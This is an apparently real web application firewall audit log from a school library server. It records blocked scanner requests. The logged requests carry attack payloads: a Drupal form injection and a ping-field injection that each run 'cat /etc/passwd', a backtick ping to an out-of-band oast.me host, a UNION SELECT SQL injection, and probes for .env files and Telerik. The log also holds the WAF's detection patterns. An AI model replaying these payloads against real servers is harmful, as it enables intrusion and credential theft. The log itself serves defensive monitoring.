[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /_search?pretty"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748885718687278 2442 (- - -) Stopwatch2: 1748885718687278 2442; combined=790, p1=387, p2=366, p3=0, p4=0, p5=37, sr=68, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c3d9682d-Z-- --0c05f335-A-- [03/Jun/2025:00:35:18 +0700] aD3g1u6eDjh4wF4csdutdAAAAIA 103.236.140.4 58612 103.236.140.4 8181 --0c05f335-B-- GET /__ HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.2 Safari/605.1.15 Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01 X-Requested-With: XMLHttpRequest X-Forwarded-For: 206.82.6.62 Cookie: dnn_IsMobile=False; DNNPersonalization=WriteFileC:\Windows\win.ini X-Varnish: 171487058 --0c05f335-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0c05f335-E-- --0c05f335-H-- Message: Access denied with code 403 (phase 2). 
Pattern match "WriteFileC:\Windows\win.ini X-Varnish: 171602165 --89243c43-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --89243c43-E-- --89243c43-H-- Message: Access denied with code 403 (phase 2). Pattern match " --103b2f0e-F-- HTTP/1.1 404 Not Found X-Frame-Options: SAMEORIGIN Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --103b2f0e-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1748917175687952 6099 (- - -) Stopwatch2: 1748917175687952 6099; combined=4141, p1=574, p2=3471, p3=23, p4=31, p5=42, sr=134, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --103b2f0e-Z-- --6a28bd35-A-- [03/Jun/2025:09:19:35 +0700] aD5bt0SujXvW2xVCZlVfvgAAAAY 103.236.140.4 41180 103.236.140.4 8181 --6a28bd35-B-- POST /soap.cgi?service=whatever-control;curl HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http Content-Length: 16 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/601.3.9 (KHTML, like Gecko) Version/9.0.2 Safari/601.3.9 Content-Type: text/xml SOAPAction: "whatever-serviceType#whatever-action" X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 171745902 --6a28bd35-C-- whatever-content --6a28bd35-F-- HTTP/1.1 404 Not Found X-Frame-Options: SAMEORIGIN Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --6a28bd35-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1748917175692529 5413 (- - -) Stopwatch2: 1748917175692529 5413; combined=3968, p1=349, p2=3548, p3=19, p4=22, p5=30, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6a28bd35-Z-- --bf3c3b20-A-- [03/Jun/2025:09:19:35 +0700] aD5bt5AN5Lj366RdGMxmkwAAANc 103.236.140.4 41190 103.236.140.4 8181 --bf3c3b20-B-- POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.0 Referer: perpustakaan.smkn22jakarta.sch.id/user/register Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http Content-Length: 631 User-Agent: Mozilla/5.0 (Kubuntu; Linux i686; rv:131.0) Gecko/20100101 Firefox/131.0 Accept: application/json Content-Type: multipart/form-data; boundary=---------------------------99533888113153068481322586663 X-Requested-With: XMLHttpRequest X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 171662255 --bf3c3b20-C-- -----------------------------99533888113153068481322586663 Content-Disposition: form-data; name="mail[#post_render][]" passthru -----------------------------99533888113153068481322586663 Content-Disposition: form-data; name="mail[#type]" markup -----------------------------99533888113153068481322586663 Content-Disposition: form-data; name="mail[#markup]" cat /etc/passwd -----------------------------99533888113153068481322586663 Content-Disposition: form-data; name="form_id" user_register_form -----------------------------99533888113153068481322586663 Content-Disposition: form-data; name="_drupal_ajax" --bf3c3b20-F-- HTTP/1.1 404 Not Found X-Frame-Options: SAMEORIGIN Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --bf3c3b20-E-- --bf3c3b20-H-- Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. 
This is not a false positive.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Multipart parsing error: Multipart: Final boundary missing."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1748917175694927 4870 (- - -) Stopwatch2: 1748917175694927 4870; combined=3795, p1=371, p2=3359, p3=20, p4=22, p5=23, sr=65, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bf3c3b20-Z-- --28b89771-A-- [03/Jun/2025:09:19:41 +0700] aD5bvZAN5Lj366RdGMxmngAAANU 103.236.140.4 41286 103.236.140.4 8181 --28b89771-B-- GET /Telerik.Web.UI.WebResource.axd?type=rau HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 171127343 --28b89771-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --28b89771-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".web.ui.webresource.axd"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748917181691888 2598 (- - -) Stopwatch2: 1748917181691888 2598; combined=1009, p1=374, p2=611, p3=0, p4=0, p5=24, sr=61, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --28b89771-Z-- --7369254d-A-- [03/Jun/2025:09:19:43 +0700] aD5bv0SujXvW2xVCZlVfwwAAABA 103.236.140.4 41320 103.236.140.4 8181 --7369254d-B-- GET /Telerik.Web.UI.WebResource.axd?_TSM_CombinedScripts_=;;System.Web.Extensions,%20Version=4.0.0.0,%20Culture=neutral,%20PublicKeyToken=31bf3856ad364e35:de-DE:db3d9eb3-6d72-4959-b303-32b61119a4a8:ea597d4b:b25378d2 HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Debian; Linux i686; rv:130.0) Gecko/20100101 Firefox/130.0 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 171635673 --7369254d-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --7369254d-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".web.ui.webresource.axd"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748917183692096 3429 (- - -) Stopwatch2: 1748917183692096 3429; combined=2010, p1=439, p2=1542, p3=0, p4=0, p5=28, sr=68, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7369254d-Z-- --bea05c46-A-- [03/Jun/2025:09:43:32 +0700] aD5hVJAN5Lj366RdGMxr7wAAAMQ 103.236.140.4 33352 103.236.140.4 8181 --bea05c46-B-- POST /apply_sec.cgi HTTP/1.0 Referer: http://perpustakaan.smkn22jakarta.sch.id/login_pic.asp Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http Content-Length: 95 User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 206.82.6.62 Cookie: uid=1234123 X-Varnish: 170192929 --bea05c46-C-- html_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0acat%20%2Fetc%2Fpasswd --bea05c46-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bea05c46-E-- --bea05c46-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /apply_sec.cgi"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748918612700718 2242 (- - -) Stopwatch2: 1748918612700718 2242; combined=673, p1=404, p2=242, p3=0, p4=0, p5=27, sr=68, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bea05c46-Z-- --14873f14-A-- [03/Jun/2025:10:18:57 +0700] aD5poQhM7ynDNybXsoNbogAAAEc 103.236.140.4 60176 103.236.140.4 8181 --14873f14-B-- GET /core/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 207.180.223.50 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 207.180.223.50 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3312.0 Safari/537.36 Accept-Charset: utf-8 --14873f14-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --14873f14-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748920737111922 1064 (- - -) Stopwatch2: 1748920737111922 1064; combined=454, p1=413, p2=0, p3=0, p4=0, p5=41, sr=132, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --14873f14-Z-- --fef9d014-A-- [03/Jun/2025:11:21:28 +0700] aD54SESujXvW2xVCZlV7lQAAABU 103.236.140.4 52720 103.236.140.4 8181 --fef9d014-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.163 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.163 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 7.0; SM-J710FN) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36 Accept-Charset: utf-8 --fef9d014-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fef9d014-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748924488001998 949 (- - -) Stopwatch2: 1748924488001998 949; combined=441, p1=395, p2=0, p3=0, p4=0, p5=45, sr=79, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fef9d014-Z-- --4cc5e311-A-- [03/Jun/2025:11:27:15 +0700] aD55o5AN5Lj366RdGMyBBAAAAMQ 103.236.140.4 57150 103.236.140.4 8181 --4cc5e311-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.73.96 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.73.96 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_2) AppleWebKit/537.4 (KHTML like Gecko) Chrome/22.0.1229.79 Safari/537.4 Accept-Charset: utf-8 --4cc5e311-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4cc5e311-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748924835348928 902 (- - -) Stopwatch2: 1748924835348928 902; combined=424, p1=367, p2=0, p3=0, p4=0, p5=57, sr=91, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4cc5e311-Z-- --69fc9a7c-A-- [03/Jun/2025:11:40:01 +0700] aD58oZAN5Lj366RdGMyD7wAAAMw 103.236.140.4 38710 103.236.140.4 8181 --69fc9a7c-B-- POST /cgi-bin/supportInstaller HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http Content-Length: 83 User-Agent: MSIE Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 171814929 --69fc9a7c-C-- fromEmailInvite=1&customerTID=unpossible'+UNION+SELECT+0,0,0,11132*379123,0,0,0,0-- --69fc9a7c-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --69fc9a7c-E-- --69fc9a7c-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\x22'`](?:;? ?\\b(?:having|select|union)\\b ?[^\\s]| ?! ?[\\x22'`\\w])|\\b(?:c(?:onnection_id|urrent_user)|database)\\b ?\\(|\\bunion\\b[\\w(\\s]*?select\\b|\\buser ?\\(|\\bschema ?\\(|\\bselect.{0,399}?\\w?\\buser ?\\(|\\binto[\\s+]+(?:dump|o ..." at MATCHED_VAR. 
[file "/usr/local/apache/modsecurity-cwaf/rules/22_SQL_SQLi.conf"] [line "27"] [id "211650"] [rev "12"] [msg "COMODO WAF: Detects MSSQL code execution and information gathering attempts||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: unpossible' UNION SELECT 0,0,0,11132*379123,0,0,0,0 found within MATCHED_VAR: unpossible' UNION SELECT 0,0,0,11132*379123,0,0,0,0"] [severity "CRITICAL"] [tag "CWAF"] [tag "SQLi"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: cgi-script Stopwatch: 1748925601776384 3859 (- - -) Stopwatch2: 1748925601776384 3859; combined=2359, p1=399, p2=1929, p3=0, p4=0, p5=31, sr=67, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --69fc9a7c-Z-- --2f3ea660-A-- [03/Jun/2025:11:42:45 +0700] aD59RY0G58RZMmoh8H3jAQAAAIk 103.236.140.4 40752 103.236.140.4 8181 --2f3ea660-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.73.96 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.73.96 X-Forwarded-Proto: https Connection: close User-Agent: NokiaN70-1/5.0609.2.0.1 Series60/2.8 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Link/6.3.1.13.0 Accept-Charset: utf-8 --2f3ea660-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2f3ea660-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748925765169894 835 (- - -) Stopwatch2: 1748925765169894 835; combined=344, p1=279, p2=0, p3=0, p4=0, p5=64, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2f3ea660-Z-- --60034510-A-- [03/Jun/2025:11:55:38 +0700] aD6ASpAN5Lj366RdGMyG5gAAAMQ 103.236.140.4 50654 103.236.140.4 8181 --60034510-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 185.220.101.38 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.220.101.38 X-Forwarded-Proto: https Connection: close Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) --60034510-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --60034510-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748926538409988 2942 (- - -) Stopwatch2: 1748926538409988 2942; combined=1361, p1=455, p2=877, p3=0, p4=0, p5=29, sr=89, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --60034510-Z-- --60514617-A-- [03/Jun/2025:13:16:34 +0700] aD6TQkSujXvW2xVCZlWUfAAAAAQ 103.236.140.4 55240 103.236.140.4 8181 --60514617-B-- GET /card_scan.php?No=30&ReaderNo=%60ping%20d0us2vpgpeonc6qdbef041ojsi8up61qb.oast.me%60 HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Safari/605.1.1 Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 171818922 --60514617-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --60514617-E-- --60514617-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?:\\b(?:c(?:d(?:\\b[^a-zA-Z0-9_]{0,}?[\\/]|[^a-zA-Z0-9_]{0,}?\\.\\.)|hmod.{0,40}?\\+.{0,3}x|md(?:\\b[^a-zA-Z0-9_]{0,}?\\/c|(?:\\.exe|32)\\b))|(?:echo\\b[^a-zA-Z0-9_]{0,}?\\by{1,}|n(?:et(?:\\b[^a-zA-Z0-9_]{1,}?\\blocalgroup|\\.exe)|(?:c|map)\\.exe)|t(? ..." at MATCHED_VAR. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "65"] [id "211210"] [rev "8"] [msg "COMODO WAF: System Command Injection||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: `ping found within ARGS:ReaderNo: `ping d0us2vpgpeonc6qdbef041ojsi8up61qb.oast.me`"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/perpus22.sock|fcgi://localhost Stopwatch: 1748931394470123 2880 (- - -) Stopwatch2: 1748931394470123 2880; combined=800, p1=441, p2=314, p3=0, p4=0, p5=44, sr=73, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --60514617-Z-- --0b937f27-A-- [03/Jun/2025:13:16:34 +0700] aD6TQkSujXvW2xVCZlWUfgAAABQ 103.236.140.4 55246 103.236.140.4 8181 --0b937f27-B-- POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.0 Referer: perpustakaan.smkn22jakarta.sch.id/user/register Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 631 User-Agent: Mozilla/5.0 (Knoppix; Linux x86_64; rv:126.0) Gecko/20100101 Firefox/126.0 Accept: application/json Content-Type: multipart/form-data; boundary=---------------------------99533888113153068481322586663 X-Requested-With: XMLHttpRequest X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 171818925 --0b937f27-C-- -----------------------------99533888113153068481322586663 Content-Disposition: form-data; name="mail[#post_render][]" passthru -----------------------------99533888113153068481322586663 Content-Disposition: form-data; name="mail[#type]" markup 
-----------------------------99533888113153068481322586663 Content-Disposition: form-data; name="mail[#markup]" cat /etc/passwd -----------------------------99533888113153068481322586663 Content-Disposition: form-data; name="form_id" user_register_form -----------------------------99533888113153068481322586663 Content-Disposition: form-data; name="_drupal_ajax" --0b937f27-F-- HTTP/1.1 404 Not Found X-Frame-Options: SAMEORIGIN Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --0b937f27-E-- --0b937f27-H-- Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Multipart parsing error: Multipart: Final boundary missing."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1748931394506350 4917 (- - -) Stopwatch2: 1748931394506350 4917; combined=3703, p1=371, p2=3261, p3=22, p4=24, p5=25, sr=67, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
